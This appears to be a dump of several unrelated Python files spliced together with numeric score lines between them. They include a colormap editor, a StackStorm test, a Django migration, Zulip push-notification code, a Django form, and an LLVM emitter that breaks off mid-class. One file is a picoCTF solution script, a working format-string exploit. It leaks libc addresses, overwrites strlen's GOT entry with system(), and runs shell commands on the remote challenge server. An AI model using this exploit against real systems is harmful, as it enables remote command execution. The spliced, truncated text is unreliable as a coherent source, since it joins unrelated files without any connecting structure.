# bp_lim[0] : bp_lim[1] : resolution * 1j]
# J_grid = J * np.ones((resolution, resolution))
# h = np.rad2deg(np.arctan2(b_grid, a_grid))
# M = np.hypot(a_grid, b_grid)
# XYZ = ViewingConditions.sRGB.CIECAM02_to_XYZ(J=J_grid, M=M, h=h)
# sRGB = XYZ_to_sRGB(XYZ)
# sRGB[np.any((sRGB < 0) | (sRGB > 1), axis=-1)] = np.nan
# return sRGB
def _viscm_editor_axes():
grid = GridSpec(1, 2,
width_ratios=[5, 1],
height_ratios=[6, 1])
axes = {'bezier': grid[0, 0],
'cm': grid[0, 1]}
axes = dict([(key, plt.subplot(value)) for (key, value) in axes.items()])
return axes
class viscm_editor(object):
def __init__(self, min_Jp=15, max_Jp=95, xp=None, yp=None):
from .bezierbuilder import BezierModel, BezierBuilder
axes = _viscm_editor_axes()
ax_btn_wireframe = plt.axes([0.7, 0.15, 0.1, 0.025])
self.btn_wireframe = Button(ax_btn_wireframe, 'Show 3D gamut')
self.btn_wireframe.on_clicked(self.plot_3d_gamut)
ax_btn_wireframe = plt.axes([0.81, 0.15, 0.1, 0.025])
self.btn_save = Button(ax_btn_wireframe, 'Save colormap')
self.btn_save.on_clicked(self.save_colormap)
ax_btn_props = plt.axes([0.81, 0.1, 0.1, 0.025])
self.btn_props = Button(ax_btn_props, 'Properties')
self.btn_props.on_clicked(self.show_viscm)
self.prop_windows = []
axcolor = 'None'
ax_jp_min = plt.axes([0.1, 0.1, 0.5, 0.03], axisbg=axcolor)
ax_jp_min.imshow(np.linspace(0, 100, 101).reshape(1, -1), cmap='gray')
ax_jp_min.set_xlim(0, 100)
ax_jp_max = plt.axes([0.1, 0.15, 0.5, 0.03], axisbg=axcolor)
ax_jp_max.imshow(np.linspace(0, 100, 101).reshape(1, -1), cmap='gray')
self.jp_min_slider = Slider(ax_jp_min, r"$J'_\mathrm{min}$", 0, 100, valinit=min_Jp)
self.jp_max_slider = Slider(ax_jp_max, r"$J'_\mathrm{max}$", 0, 100, valinit=max_Jp)
self.jp_min_slider.on_changed(self._jp_update)
self.jp_max_slider.on_changed(self._jp_update)
# This is my favorite set of control points so far (just from playing
# around with things):
# min_Jp = 15
# max_Jp = 95
# xp =
# [-4, 27.041103603603631, 84.311067635550557, 12.567076579094476, -9.6]
# yp =
# [-34, -41.447876447876524, 36.28563443264386, 25.357741755170423, 41]
# -- njs, 2015-04-05
if xp is None:
xp = [-4, 38.289146128951984, 52.1923711457504,
39.050944362271053, 18.60872492130315, -9.6]
if yp is None:
yp = [-34, -34.34528254916614, -21.594701710471412,
31.701084689194829, 29.510846891948262, 41]
self.bezier_model = BezierModel(xp, yp)
self.cmap_model = BezierCMapModel(self.bezier_model,
self.jp_min_slider.val,
self.jp_max_slider.val)
self.highlight_point_model = HighlightPointModel(self.cmap_model, 0.5)
self.bezier_builder = BezierBuilder(axes['bezier'], self.bezier_model)
self.bezier_gamut_viewer = GamutViewer2D(axes['bezier'],
self.highlight_point_model)
tmp = HighlightPoint2DView(axes['bezier'],
self.highlight_point_model)
self.bezier_highlight_point_view = tmp
#draw_pure_hue_angles(axes['bezier'])
axes['bezier'].set_xlim(-100, 100)
axes['bezier'].set_ylim(-100, 100)
self.cmap_view = CMapView(axes['cm'], self.cmap_model)
self.cmap_highlighter = HighlightPointBuilder(
axes['cm'],
self.highlight_point_model)
print("Click sliders at bottom to change min/max lightness")
print("Click on colorbar to adjust gamut view")
print("Click-drag to move control points, ")
print(" shift-click to add, control-click to delete")
def plot_3d_gamut(self, event):
fig, ax = plt.subplots(subplot_kw=dict(projection='3d'))
self.wireframe_view = WireframeView(ax,
self.cmap_model,
self.highlight_point_model)
plt.show()
def save_colormap(self, event):
import textwrap
template = textwrap.dedent('''
from matplotlib.colors import LinearSegmentedColormap
from numpy import nan, inf
# Used to reconstruct the colormap in pycam02ucs.cm.viscm
parameters = {{'xp': {xp},
'yp': {yp},
'min_Jp': {min_Jp},
'max_Jp': {max_Jp}}}
cm_data = {array_list}
test_cm = LinearSegmentedColormap.from_list(__file__, cm_data)
if __name__ == "__main__":
import matplotlib.pyplot as plt
import numpy as np
try:
from pycam02ucs.cm.viscm import viscm
viscm(test_cm)
except ImportError:
print("pycam02ucs not found, falling back on simple display")
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto',
cmap=test_cm)
plt.show()
''')
rgb, _ = self.cmap_model.get_sRGB(num=256)
with open('/tmp/new_cm.py', 'w') as f:
array_list = np.array_repr(rgb, max_line_width=78)
array_list = array_list.replace('array(', '')[:-1]
xp, yp = self.cmap_model.bezier_model.get_control_points()
data = dict(array_list=array_list,
xp=xp,
yp=yp,
min_Jp=self.cmap_model.min_Jp,
max_Jp=self.cmap_model.max_Jp)
f.write(template.format(**data))
print("*" * 50)
print("Saved colormap to /tmp/new_cm.py")
print("*" * 50)
def show_viscm(self, event):
cm = LinearSegmentedColormap.from_list(
'test_cm',
self.cmap_model.get_sRGB(num=256)[0])
self.prop_windows.append(viscm(cm, name='test_cm'))
plt.show()
def _jp_update(self, val):
jp_min = self.jp_min_slider.val
jp_max = self.jp_max_slider.val
smallest, largest = min(jp_min, jp_max), max(jp_min, jp_max)
if (jp_min > smallest) or (jp_max < largest):
self.jp_min_slider.set_val(smallest)
self.jp_max_slider.set_val(largest)
self.cmap_model.set_Jp_minmax(smallest, largest)
class BezierCMapModel(object):
def __init__(self, bezier_model, min_Jp, max_Jp):
self.bezier_model = bezier_model
self.min_Jp = min_Jp
self.max_Jp = max_Jp
self.trigger = Trigger()
self.bezier_model.trigger.add_callback(self.trigger.fire)
def set_Jp_minmax(self, min_Jp, max_Jp):
self.min_Jp = min_Jp
self.max_Jp = max_Jp
self.trigger.fire()
def get_Jpapbp_at(self, at):
ap, bp = self.bezier_model.get_bezier_points_at(at)
Jp = (self.max_Jp - self.min_Jp) * at + self.min_Jp
return Jp, ap, bp
def get_Jpapbp(self, num=200):
return self.get_Jpapbp_at(np.linspace(0, 1, num))
def get_sRGB(self, num=200):
# Return sRGB and out-of-gamut mask
Jp, ap, bp = self.get_Jpapbp(num=num)
sRGB = _uniform_to_sRGB1(np.column_stack((Jp, ap, bp)))
oog = np.any((sRGB > 1) | (sRGB < 0), axis=-1)
sRGB[oog, :] = np.nan
return sRGB, oog
class CMapView(object):
def __init__(self, ax, cmap_model):
self.ax = ax
self.cmap_model = cmap_model
rgb_display, oog_display = self._drawable_arrays()
self.image = self.ax.imshow(rgb_display, extent=(0, 0.2, 0, 1),
origin="lower")
self.gamut_alert_image = self.ax.imshow(oog_display,
extent=(0.05, 0.15, 0, 1),
origin="lower")
self.ax.set_xlim(0, 0.2)
self.ax.set_ylim(0, 1)
self.ax.get_xaxis().set_visible(False)
self.cmap_model.trigger.add_callback(self._refresh)
def _drawable_arrays(self):
rgb, oog = self.cmap_model.get_sRGB()
rgb_display = rgb[:, np.newaxis, :]
oog_display = np.empty((rgb.shape[0], 1, 4))
oog_display[...] = [0, 0, 0, 0]
oog_display[oog, :, :] = [0, 1, 1, 1]
return rgb_display, oog_display
def _refresh(self):
rgb_display, oog_display = self._drawable_arrays()
self.image.set_data(rgb_display)
self.gamut_alert_image.set_data(oog_display)
class HighlightPointModel(object):
def __init__(self, cmap_model, point):
self._cmap_model = cmap_model
self._point = point
self.trigger = Trigger()
self._cmap_model.trigger.add_callback(self.trigger.fire)
def get_point(self):
return self._point
def set_point(self, point):
self._point = point
self.trigger.fire()
def get_Jpapbp(self):
return self._cmap_model.get_Jpapbp_at(self._point)
class HighlightPointBuilder(object):
def __init__(self, ax, highlight_point_model):
self.ax = ax
self.highlight_point_model = highlight_point_model
self.canvas = self.ax.figure.canvas
self._in_drag = False
self.canvas.mpl_connect("button_press_event", self._on_button_press)
self.canvas.mpl_connect("motion_notify_event", self._on_motion)
self.canvas.mpl_connect("button_release_event",
self._on_button_release)
self.marker_line = self.ax.axhline(highlight_point_model.get_point(),
linewidth=3, color="r")
self.highlight_point_model.trigger.add_callback(self._refresh)
def _on_button_press(self, event):
if event.inaxes != self.ax:
return
if event.button != 1:
return
self._in_drag = True
self.highlight_point_model.set_point(event.ydata)
def _on_motion(self, event):
if self._in_drag and event.ydata is not None:
self.highlight_point_model.set_point(event.ydata)
def _on_button_release(self, event):
if event.button != 1:
return
self._in_drag = False
def _refresh(self):
point = self.highlight_point_model.get_point()
self.marker_line.set_data([0, 1], [point, point])
self.canvas.draw()
class GamutViewer2D(object):
def __init__(self, ax, highlight_point_model,
ap_lim=(-50, 50), bp_lim=(-50, 50)):
self.ax = ax
self.highlight_point_model = highlight_point_model
self.ap_lim = ap_lim
self.bp_lim = bp_lim
self.bgcolors = {"light": (0.9, 0.9, 0.9),
"dark": (0.1, 0.1, 0.1)}
# We want some hysteresis, so that there's no point where wiggling the
# line back and forth causes background flickering.
self.bgcolor_ranges = {"light": (0, 60), "dark": (40, 100)}
self.bg_opposites = {"light": "dark", "dark": "light"}
self.bg = "light"
self.ax.set_axis_bgcolor(self.bgcolors[self.bg])
self.image = self.ax.imshow([[[0, 0, 0]]], aspect="equal",
extent=ap_lim + bp_lim,
origin="lower")
self.highlight_point_model.trigger.add_callback(self._refresh)
def _refresh(self):
Jp, _, _ = self.highlight_point_model.get_Jpapbp()
low, high = self.bgcolor_ranges[self.bg]
if not (low <= Jp <= high):
self.bg = self.bg_opposites[self.bg]
self.ax.set_axis_bgcolor(self.bgcolors[self.bg])
sRGB = sRGB_gamut_Jp_slice(Jp, self.ap_lim, self.bp_lim)
self.image.set_data(sRGB)
class HighlightPoint2DView(object):
def __init__(self, ax, highlight_point_model):
self.ax = ax
self.highlight_point_model = highlight_point_model
_, ap, bp = self.highlight_point_model.get_Jpapbp()
self.marker = self.ax.plot([ap], [bp], "y.", mew=3)[0]
self.highlight_point_model.trigger.add_callback(self._refresh)
def _refresh(self):
_, ap, bp = self.highlight_point_model.get_Jpapbp()
self.marker.set_data([ap], [bp])
self.ax.figure.canvas.draw()
class WireframeView(object):
def __init__(self, ax, cmap_model, highlight_point_model):
self.ax = ax
self.cmap_model = cmap_model
self.highlight_point_model = highlight_point_model
Jp, ap, bp = self.cmap_model.get_Jpapbp()
self.line = self.ax.plot([0, 10], [0, 10])[0]
#self.line = self.ax.plot(Jp, ap, bp)[0]
Jp, ap, bp = self.highlight_point_model.get_Jpapbp()
self.marker = self.ax.plot([Jp], [ap], [bp], "y.", mew=3)[0]
gamut_patch = sRGB_gamut_patch()
# That function returns a patch where each face is colored to match
# the represented colors. For present purposes we want something
# less... colorful.
gamut_patch.set_facecolor([0.5, 0.5, 0.5, 0.1])
gamut_patch.set_edgecolor([0.2, 0.2, 0.2, 0.1])
self.ax.add_collection3d(gamut_patch)
_setup_Jpapbp_axis(self.ax)
#self.cmap_model.trigger.add_callback(self._refresh_line)
#self.highlight_point_model.trigger.add_callback(self._refresh_point)
self._refresh_line()
self._refresh_point()
def _refresh_line(self):
Jp, ap, bp = self.cmap_model.get_Jpapbp()
self.line.set_data(ap, bp)
self.line.set_3d_properties(zs=Jp)
self.ax.figure.canvas.draw()
def _refresh_point(self):
Jp, ap, bp = self.highlight_point_model.get_Jpapbp()
self.marker.set_data([ap], [bp])
self.marker.set_3d_properties(zs=[Jp])
self.ax.figure.canvas.draw()
def main(argv):
import argparse
# Usage:
# python -m viscm
# python -m viscm edit
# python -m viscm edit <file.py>
# (file.py must define some appropriate globals)
# python -m viscm view <file.py>
# (file.py must define a global named "test_cm")
# python -m viscm view "matplotlib builtin colormap"
# python -m viscm view --save=foo.png ...
parser = argparse.ArgumentParser(
prog="python -m viscm",
description="A colormap tool.",
)
parser.add_argument("action", metavar="ACTION",
help="'edit' or 'view'",
choices=["edit", "view", "show"],
default="edit",
nargs="?")
parser.add_argument("colormap", metavar="COLORMAP",
default=None,
help="A .py file saved from the editor, or "
"the name of a matplotlib builtin colormap",
nargs="?")
parser.add_argument("--save", metavar="FILE",
default=None,
help="Immediately save visualization to a file (view-mode only).")
parser.add_argument("--quit", default=False, action="store_true",
help="Quit immediately after starting (useful with --save).")
args = parser.parse_args(argv)
params = {}
cmap = None
if args.colormap:
if os.path.isfile(args.colormap):
ns = {'__name__': '',
'__file__': os.path.basename(args.colormap),
}
with open(args.colormap) as f:
code = compile(f.read(),
os.path.basename(args.colormap),
'exec')
exec(code, globals(), ns)
params = ns.get('parameters', {})
if "min_JK" in params:
params["min_Jp"] = params.pop("min_JK")
params["max_Jp"] = params.pop("max_JK")
cmap = ns.get("test_cm", None)
else:
cmap = plt.get_cmap(args.colormap)
# Easter egg! I keep typing 'show' instead of 'view' so accept both
if args.action in ("view", "show"):
if cmap is None:
sys.exit("Please specify a colormap")
v = viscm(cmap)
if args.save is not None:
v.fig.set_size_inches(20, 12)
v.fig.savefig(args.save)
elif args.action == "edit":
if params is None:
sys.exit("Sorry, I don't know how to edit the specified colormap")
# Hold a reference so it doesn't get GC'ed
v = viscm_editor(**params)
else:
raise RuntimeError("can't happen")
if args.quit:
sys.exit()
plt.show()
if __name__ == "__main__":
main(sys.argv[1:])
| 0.001097 |
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import st2actions
from st2common.constants.action import LIVEACTION_STATUS_REQUESTED
from st2common.constants.action import LIVEACTION_STATUS_SUCCEEDED
from st2common.constants.action import LIVEACTION_STATUS_TIMED_OUT
from st2common.bootstrap.policiesregistrar import register_policy_types
from st2common.models.db.action import LiveActionDB
from st2common.persistence.action import LiveAction, ActionExecution
from st2common.services import action as action_service
from st2actions.policies.retry import ExecutionRetryPolicyApplicator
from st2tests.base import DbTestCase
from st2tests.base import CleanDbTestCase
from st2tests.fixturesloader import FixturesLoader
PACK = 'generic'
TEST_FIXTURES = {
'runners': [
'testrunner1.yaml'
],
'actions': [
'action1.yaml'
],
'policies': [
'policy_4.yaml'
]
}
class RetryPolicyTestCase(CleanDbTestCase):
@classmethod
def setUpClass(cls):
DbTestCase.setUpClass()
super(RetryPolicyTestCase, cls).setUpClass()
def setUp(self):
super(RetryPolicyTestCase, self).setUp()
# Register common policy types
register_policy_types(st2actions)
loader = FixturesLoader()
models = loader.save_fixtures_to_db(fixtures_pack=PACK,
fixtures_dict=TEST_FIXTURES)
# Instantiate policy applicator we will use in the tests
policy_db = models['policies']['policy_4.yaml']
retry_on = policy_db.parameters['retry_on']
max_retry_count = policy_db.parameters['max_retry_count']
self.policy = ExecutionRetryPolicyApplicator(policy_ref='test_policy',
policy_type='action.retry',
retry_on=retry_on,
max_retry_count=max_retry_count,
delay=0)
def test_retry_on_timeout_no_retry_since_no_timeout_reached(self):
# Verify initial state
self.assertSequenceEqual(LiveAction.get_all(), [])
self.assertSequenceEqual(ActionExecution.get_all(), [])
# Start a mock action which succeeds
liveaction = LiveActionDB(action='wolfpack.action-1', parameters={'actionstr': 'foo'})
live_action_db, execution_db = action_service.request(liveaction)
live_action_db.status = LIVEACTION_STATUS_SUCCEEDED
execution_db.status = LIVEACTION_STATUS_SUCCEEDED
LiveAction.add_or_update(live_action_db)
ActionExecution.add_or_update(execution_db)
# Simulate policy "apply_after" run
self.policy.apply_after(target=live_action_db)
# There should only be 1 object since the action didn't timeout and therefore it wasn't
# retried
live_action_dbs = LiveAction.get_all()
action_execution_dbs = ActionExecution.get_all()
self.assertEqual(len(live_action_dbs), 1)
self.assertEqual(len(action_execution_dbs), 1)
self.assertEqual(action_execution_dbs[0].status, LIVEACTION_STATUS_SUCCEEDED)
def test_retry_on_timeout_first_retry_is_successful(self):
# Verify initial state
self.assertSequenceEqual(LiveAction.get_all(), [])
self.assertSequenceEqual(ActionExecution.get_all(), [])
# Start a mock action which times out
liveaction = LiveActionDB(action='wolfpack.action-1', parameters={'actionstr': 'foo'})
live_action_db, execution_db = action_service.request(liveaction)
live_action_db.status = LIVEACTION_STATUS_TIMED_OUT
execution_db.status = LIVEACTION_STATUS_TIMED_OUT
LiveAction.add_or_update(live_action_db)
ActionExecution.add_or_update(execution_db)
# Simulate policy "apply_after" run
self.policy.apply_after(target=live_action_db)
# There should be two objects - original execution and retried execution
live_action_dbs = LiveAction.get_all()
action_execution_dbs = ActionExecution.get_all()
self.assertEqual(len(live_action_dbs), 2)
self.assertEqual(len(action_execution_dbs), 2)
self.assertEqual(action_execution_dbs[0].status, LIVEACTION_STATUS_TIMED_OUT)
self.assertEqual(action_execution_dbs[1].status, LIVEACTION_STATUS_REQUESTED)
# Simulate success of second action so no it shouldn't be retried anymore
live_action_db = live_action_dbs[1]
live_action_db.status = LIVEACTION_STATUS_SUCCEEDED
LiveAction.add_or_update(live_action_db)
# Simulate policy "apply_after" run
self.policy.apply_after(target=live_action_db)
# There should be no new object since action succeeds so no retry was attempted
live_action_dbs = LiveAction.get_all()
action_execution_dbs = ActionExecution.get_all()
self.assertEqual(len(live_action_dbs), 2)
self.assertEqual(len(action_execution_dbs), 2)
self.assertEqual(live_action_dbs[0].status, LIVEACTION_STATUS_TIMED_OUT)
self.assertEqual(live_action_dbs[1].status, LIVEACTION_STATUS_SUCCEEDED)
def test_retry_on_timeout_max_retries_reached(self):
# Verify initial state
self.assertSequenceEqual(LiveAction.get_all(), [])
self.assertSequenceEqual(ActionExecution.get_all(), [])
# Start a mock action which times out
liveaction = LiveActionDB(action='wolfpack.action-1', parameters={'actionstr': 'foo'})
live_action_db, execution_db = action_service.request(liveaction)
live_action_db.status = LIVEACTION_STATUS_TIMED_OUT
live_action_db.context['policies'] = {}
live_action_db.context['policies']['retry'] = {'retry_count': 2}
execution_db.status = LIVEACTION_STATUS_TIMED_OUT
LiveAction.add_or_update(live_action_db)
ActionExecution.add_or_update(execution_db)
# Simulate policy "apply_after" run
self.policy.apply_after(target=live_action_db)
# Note: There should be no new objects since max retries has been reached
live_action_dbs = LiveAction.get_all()
action_execution_dbs = ActionExecution.get_all()
self.assertEqual(len(live_action_dbs), 1)
self.assertEqual(len(action_execution_dbs), 1)
self.assertEqual(action_execution_dbs[0].status, LIVEACTION_STATUS_TIMED_OUT)
| 0.002228 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-07 21:02
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Consommation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('odometre', models.IntegerField()),
('quantite_essence', models.DecimalField(decimal_places=2, max_digits=5)),
('date_conso', models.DateField(default=django.utils.timezone.now)),
('prix_litre', models.DecimalField(decimal_places=2, max_digits=6)),
],
),
migrations.CreateModel(
name='Entretien',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.CharField(max_length=100)),
('montant', models.DecimalField(decimal_places=2, max_digits=5)),
('date_frais', models.DateField(default=django.utils.timezone.now)),
],
),
migrations.CreateModel(
name='Voiture',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('marque', models.CharField(max_length=20)),
('type', models.CharField(max_length=20)),
('annee', models.IntegerField()),
('petit_nom', models.CharField(max_length=20)),
('odometre_depart', models.IntegerField()),
('date_achat', models.DateField(default=django.utils.timezone.now)),
('cout_achat', models.DecimalField(decimal_places=2, max_digits=8)),
],
),
migrations.AddField(
model_name='entretien',
name='voiture',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='voiture.Voiture'),
),
migrations.AddField(
model_name='consommation',
name='voiture',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='voiture.Voiture'),
),
]
| 0.004926 |
import logging
import urllib
from typing import Any, Dict, List, Mapping, Tuple, Union
import orjson
import requests
from django.conf import settings
from django.forms.models import model_to_dict
from django.utils.translation import gettext as _
from analytics.models import InstallationCount, RealmCount
from version import ZULIP_VERSION
from zerver.lib.exceptions import JsonableError
from zerver.lib.export import floatify_datetime_fields
from zerver.models import RealmAuditLog
class PushNotificationBouncerException(Exception):
pass
class PushNotificationBouncerRetryLaterError(JsonableError):
http_status_code = 502
def send_to_push_bouncer(
method: str,
endpoint: str,
post_data: Union[bytes, Mapping[str, Union[str, bytes]]],
extra_headers: Mapping[str, str] = {},
) -> Dict[str, object]:
"""While it does actually send the notice, this function has a lot of
code and comments around error handling for the push notifications
bouncer. There are several classes of failures, each with its own
potential solution:
* Network errors with requests.request. We raise an exception to signal
it to the callers.
* 500 errors from the push bouncer or other unexpected responses;
we don't try to parse the response, but do make clear the cause.
* 400 errors from the push bouncer. Here there are 2 categories:
Our server failed to connect to the push bouncer (should throw)
vs. client-side errors like and invalid token.
"""
url = urllib.parse.urljoin(
settings.PUSH_NOTIFICATION_BOUNCER_URL, "/api/v1/remotes/" + endpoint
)
api_auth = requests.auth.HTTPBasicAuth(settings.ZULIP_ORG_ID, settings.ZULIP_ORG_KEY)
headers = {"User-agent": f"ZulipServer/{ZULIP_VERSION}"}
headers.update(extra_headers)
try:
res = requests.request(
method, url, data=post_data, auth=api_auth, timeout=30, verify=True, headers=headers
)
except (
requests.exceptions.Timeout,
requests.exceptions.SSLError,
requests.exceptions.ConnectionError,
) as e:
raise PushNotificationBouncerRetryLaterError(
f"{e.__class__.__name__} while trying to connect to push notification bouncer"
)
if res.status_code >= 500:
# 500s should be resolved by the people who run the push
# notification bouncer service, and they'll get an appropriate
# error notification from the server. We raise an exception to signal
# to the callers that the attempt failed and they can retry.
error_msg = "Received 500 from push notification bouncer"
logging.warning(error_msg)
raise PushNotificationBouncerRetryLaterError(error_msg)
elif res.status_code >= 400:
# If JSON parsing errors, just let that exception happen
result_dict = orjson.loads(res.content)
msg = result_dict["msg"]
if "code" in result_dict and result_dict["code"] == "INVALID_ZULIP_SERVER":
# Invalid Zulip server credentials should email this server's admins
raise PushNotificationBouncerException(
_("Push notifications bouncer error: {}").format(msg)
)
else:
# But most other errors coming from the push bouncer
# server are client errors (e.g. never-registered token)
# and should be handled as such.
raise JsonableError(msg)
elif res.status_code != 200:
# Anything else is unexpected and likely suggests a bug in
# this version of Zulip, so we throw an exception that will
# email the server admins.
raise PushNotificationBouncerException(
f"Push notification bouncer returned unexpected status code {res.status_code}"
)
# If we don't throw an exception, it's a successful bounce!
return orjson.loads(res.content)
def send_json_to_push_bouncer(method: str, endpoint: str, post_data: Mapping[str, object]) -> None:
send_to_push_bouncer(
method,
endpoint,
orjson.dumps(post_data),
extra_headers={"Content-type": "application/json"},
)
REALMAUDITLOG_PUSHED_FIELDS = [
"id",
"realm",
"event_time",
"backfilled",
"extra_data",
"event_type",
]
def build_analytics_data(
realm_count_query: Any, installation_count_query: Any, realmauditlog_query: Any
) -> Tuple[List[Dict[str, Any]], List[Dict[str, Any]], List[Dict[str, Any]]]:
# We limit the batch size on the client side to avoid OOM kills timeouts, etc.
MAX_CLIENT_BATCH_SIZE = 10000
data = {}
data["analytics_realmcount"] = [
model_to_dict(row) for row in realm_count_query.order_by("id")[0:MAX_CLIENT_BATCH_SIZE]
]
data["analytics_installationcount"] = [
model_to_dict(row)
for row in installation_count_query.order_by("id")[0:MAX_CLIENT_BATCH_SIZE]
]
data["zerver_realmauditlog"] = [
model_to_dict(row, fields=REALMAUDITLOG_PUSHED_FIELDS)
for row in realmauditlog_query.order_by("id")[0:MAX_CLIENT_BATCH_SIZE]
]
floatify_datetime_fields(data, "analytics_realmcount")
floatify_datetime_fields(data, "analytics_installationcount")
floatify_datetime_fields(data, "zerver_realmauditlog")
return (
data["analytics_realmcount"],
data["analytics_installationcount"],
data["zerver_realmauditlog"],
)
def send_analytics_to_remote_server() -> None:
# first, check what's latest
try:
result = send_to_push_bouncer("GET", "server/analytics/status", {})
except PushNotificationBouncerRetryLaterError as e:
logging.warning(e.msg)
return
last_acked_realm_count_id = result["last_realm_count_id"]
last_acked_installation_count_id = result["last_installation_count_id"]
last_acked_realmauditlog_id = result["last_realmauditlog_id"]
(realm_count_data, installation_count_data, realmauditlog_data) = build_analytics_data(
realm_count_query=RealmCount.objects.filter(id__gt=last_acked_realm_count_id),
installation_count_query=InstallationCount.objects.filter(
id__gt=last_acked_installation_count_id
),
realmauditlog_query=RealmAuditLog.objects.filter(
event_type__in=RealmAuditLog.SYNCED_BILLING_EVENTS, id__gt=last_acked_realmauditlog_id
),
)
if len(realm_count_data) + len(installation_count_data) + len(realmauditlog_data) == 0:
return
request = {
"realm_counts": orjson.dumps(realm_count_data).decode(),
"installation_counts": orjson.dumps(installation_count_data).decode(),
"realmauditlog_rows": orjson.dumps(realmauditlog_data).decode(),
"version": orjson.dumps(ZULIP_VERSION).decode(),
}
# Gather only entries with an ID greater than last_realm_count_id
try:
send_to_push_bouncer("POST", "server/analytics", request)
except JsonableError as e:
logging.warning(e.msg)
| 0.002141 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2014 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from django import forms
from django.utils.encoding import smart_str
from django.forms.util import ErrorDict, ValidationError
from django.forms.fields import FileField, CharField
class NonASCIIForm(forms.Form):
def __init__(self, *args, **kwargs):
super(NonASCIIForm, self).__init__(*args, **kwargs)
def full_clean(self):
"""
Cleans all of self.data and populates self._errors and
self.cleaned_data.
"""
self._errors = ErrorDict()
if not self.is_bound: # Stop further processing.
return
self.cleaned_data = {}
# If the form is permitted to be empty, and none of the form data has
# changed from the initial data, short circuit any validation.
if self.empty_permitted and not self.has_changed():
return
for name, field in self.fields.items():
# value_from_datadict() gets the data from the data dictionaries.
# Each widget type knows how to retrieve its own data, because
# some widgets split data over several HTML fields.
value = field.widget.value_from_datadict(
self.data, self.files, self.add_prefix(name))
try:
if isinstance(field, FileField):
initial = self.initial.get(name, field.initial)
value = field.clean(value, initial)
elif isinstance(field, CharField):
if (value is not None and
isinstance(value, basestring) and len(value) > 0):
value = str(smart_str(value))
else:
value = field.clean(value)
else:
value = field.clean(value)
self.cleaned_data[name] = value
if hasattr(self, 'clean_%s' % name):
value = getattr(self, 'clean_%s' % name)()
self.cleaned_data[name] = value
except ValidationError, e:
self._errors[name] = self.error_class(e.messages)
if name in self.cleaned_data:
del self.cleaned_data[name]
try:
self.cleaned_data = self.clean()
except ValidationError, e:
self._errors[forms.Form.NON_FIELD_ERRORS] = \
self.error_class(e.messages)
if self._errors:
delattr(self, 'cleaned_data')
| 0 |
import struct, time
from socket import *
def recv_timeout(the_socket,timeout=2):
the_socket.setblocking(0)
total_data=[];
data='';
begin=time.time()
while 1:
if total_data and time.time()-begin > timeout:
break
elif time.time()-begin > timeout*2:
break
try:
data = the_socket.recv(8192)
if data:
total_data.append(data)
begin = time.time()
else:
time.sleep(0.1)
except:
pass
the_socket.setblocking(1)
return ''.join(total_data)
def indicator(exploit):
return "ABCD"+exploit+"EFGH"
def value(reply):
start = reply.index("ABCD")+4
end = reply.index("EFGH")
return reply[start:end]
s = socket(AF_INET, SOCK_STREAM)
s.connect(('shell2017.picoctf.com', 44887))
#PAYLOAD 1: Write PRINTF_PLT to a location
#134519023
exploit = "%134519023x%9$n"
s.send(exploit+'\n')
recv_timeout(s)
#print s.recv(4096)
#DEBUG 1: Read Written Data
exploit = indicator("%16$x")
s.send(exploit+'\n')
print value(s.recv(2048))
#Should print 0x08049970
#PAYLOAD 2: Get the 'printf' libc address
exploit = indicator("%16$s")
s.send(exploit+'\n')
data = value(s.recv(2048))
data = data[0:4]
printf_libc =''
for c in data:
printf_libc = hex(ord(c))[2:] + printf_libc
print printf_libc
#Calculate base libc address
base_libc = int(printf_libc, 16) - 0x4cc70
print hex(base_libc)
#Calculate 'system' libc address
system_libc = base_libc + 0x3e3e0
print hex(system_libc)
#PAYLOAD 3: Write STRLEN_PLT to a location
#39151, 39155, 39167, 39171, 39179
exploit = "%39167x%9$hn"
s.send(exploit+'\n')
recv_timeout(s)
#print s.recv(4096)
#DEBUG 3: Read Written Data
exploit = indicator("%16$x")
s.send(exploit+'\n')
print value(s.recv(2048))
#Should print 0x804998c
#PAYLOAD 4: Overwrite the 'strlen' with 'system'
portion = system_libc // 10
remainder = system_libc % 10
exploit = "; /bin/cat flag.txt #"
exploit += ("%"+str(portion)+"x")*9
exploit += "%"+str(portion+remainder-150)+"x%16$n"
s.send(exploit+'\n')
data = recv_timeout(s)
print "".join(data.split())
#PAYLOAD 5: Execute shell commands
print "Sending Final Payload"
exploit = "; /bin/ls #"
s.send(exploit+'\n')
data = recv_timeout(s)
print "".join(data.split())
print "Completed"
s.close()
| 0.014255 |
import grammar
import contextlib
import collections
import util
import datamodel
import copy
import os
import functools
#Underlying machinery for tracking TU state and emitting LLVM code.
class Variable:
#Holds a LLVM identifier, OType pair
def __init__(self, var, type):
self.name=var
self.type=type
def __str__(self):
return "Var({} {})".format(self.type, self.name)
def __repr__(self):
return str(self)
class Emitter:
